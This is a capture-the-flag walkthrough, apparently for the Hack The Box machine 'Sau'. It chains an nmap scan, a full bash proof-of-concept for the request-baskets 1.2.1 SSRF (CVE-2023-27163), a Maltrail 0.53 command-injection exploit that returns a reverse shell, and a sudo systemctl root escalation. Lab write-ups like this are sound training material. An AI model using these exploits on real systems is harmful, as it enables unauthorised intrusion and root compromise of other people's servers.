# Sau

## Nmap Scan

```
$ nmap -sC -sV -Pn -oN nmap 10.10.11.224
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 08:53 +08
Nmap scan report for 10.10.11.224
Host is up (0.048s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 16 May 2024 00:49:15 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Thu, 16 May 2024 00:48:49 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Thu, 16 May 2024 00:48:49 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94SVN%I=7%D=5/16%Time=6645592C%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/htm
SF:l;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Thu,\x2016\x20May\
SF:x202024\x2000:48:49\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\
SF:"/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x
SF:20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Thu,\x2016\x20May\
SF:x202024\x2000:48:49\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
SF:est,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla
SF:in;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque
SF:st")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\
SF:r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nDate:\x20Thu,\x2016\x20May\x202024\x2000:49:15\x20GM
SF:T\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20
SF:name\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}
SF:\$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.01 seconds
```

## Gaining Access

### Port 55555

There is this website on Port 55555. Upon further inspection, the website is being powered by `request-basekets` with the version `1.2.1`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FXEDJ1YLd6XD3TLnSzUUZ%2Fimage.png?alt=media&#x26;token=cf0df0bb-d8d0-4a84-a512-5d2d0f4e0bd6" alt=""><figcaption></figcaption></figure>

Upon further research on `request-baskets` with that version, we can see that there is an SSRF vulnerability with that version.

{% embed url="<https://medium.com/@li_allouche/request-baskets-1-2-1-server-side-request-forgery-cve-2023-27163-2bab94f201f7>" %}

```bash
# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)  
# Exploit Author: Iyaad Luqman K (init_6)  
# Application: Request-Baskets v1.2.1  
# Tested on: Ubuntu 22.04  
# CVE: CVE-2023-27163  
  
  
# PoC  
#!/bin/bash  
  
  
if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then  
help="Usage: exploit.sh <URL> <TARGET>\n\n";  
help+="Arguments:\n" \  
help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n";  
help+=" TARGET";  
  
echo -e "$help";  
exit 1;  
fi  
  
URL=$1  
ATTACKER_SERVER=$2  
  
if [ "${URL: -1}" != "/" ]; then  
URL="$URL/";  
fi;  
  
BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");  
  
API_URL="$URL""api/baskets/$BASKET_NAME";  
  
PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";  
  
echo "> Creating the \"$BASKET_NAME\" proxy basket...";  
  
if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then  
echo "> FATAL: Could not properly request $API_URL. Is the server online?";  
exit 1;  
fi;  
  
BASKET_URL="$URL$BASKET_NAME";  
  
echo "> Basket created!";  
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";  
  
if ! jq --help 1>/dev/null; then  
echo "> Response body (Authorization): $response";  
else  
echo "> Authorization: $(echo "$response" | jq -r ".token")";  
fi;  
  
exit 0;  
```

By using this exploit, we can exploit the SSRF vulnerability and get the website on port 80.

```bash
$ bash request-baskets-exploit.sh http://10.10.11.224:55555 http://127.0.0.1   
> Creating the "fcjkly" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/fcjkly now makes the server request to http://127.0.0.1.
> Authorization: uhQpD9GZDMsUtNxOqrfszl1VYPWGGSUA4cFLqS-97OHO
```

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FoDysAlLR8VSQeVfe2p2O%2Fimage.png?alt=media&#x26;token=52f9f7b0-93ef-430c-bdf3-0bd3cc150f6c" alt=""><figcaption></figcaption></figure>

### Maltrail RCE Vulnerability

On port 80, we can see that the website is powered by `Maltrail (v0.53)`. After searching online, there is an Unauthenticated OS Command Injection (RCE) for that version.

{% embed url="<https://github.com/spookier/Maltrail-v0.53-Exploit>" %}

The syntax for the exploit is as shown below

```bash
python3 exploit.py [listening_IP] [listening_PORT] [target_URL]
```

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FP8hEloLVjHZApyli976L%2Fimage.png?alt=media&#x26;token=1ed6289f-c8f5-4956-8753-b01851595abd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F48BNRH4FEUnVKyKTODu4%2Fimage.png?alt=media&#x26;token=51cf6f87-e151-4970-aed7-835a3bbba5ba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F422SUdHMgQc66YL0IFz4%2Fimage.png?alt=media&#x26;token=2e942a6f-df66-45dc-b583-028b721158c2" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Sudo -l

After getting the shell as `puma`, we can see that the user has a permission to run a `/usr/bin/systemctl status trail.service` as root using sudo.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FSFjp2LC5mwmiEjSRJIjg%2Fimage.png?alt=media&#x26;token=3ec3fff4-ce33-429e-8529-cecf5e4700c5" alt=""><figcaption></figcaption></figure>

After doing some research online, there is a way to gain root shell through that command using the information gathered from the website.

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/>" %}

By following those steps in the website, we are able to get a root shell out of it and in turn able to get the `root.txt` flag

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FJ2xwEk7ncDvwjqmTSR4K%2Fimage.png?alt=media&#x26;token=5abec86e-bae1-4019-a069-4c8d2b2f0382" alt=""><figcaption></figcaption></figure>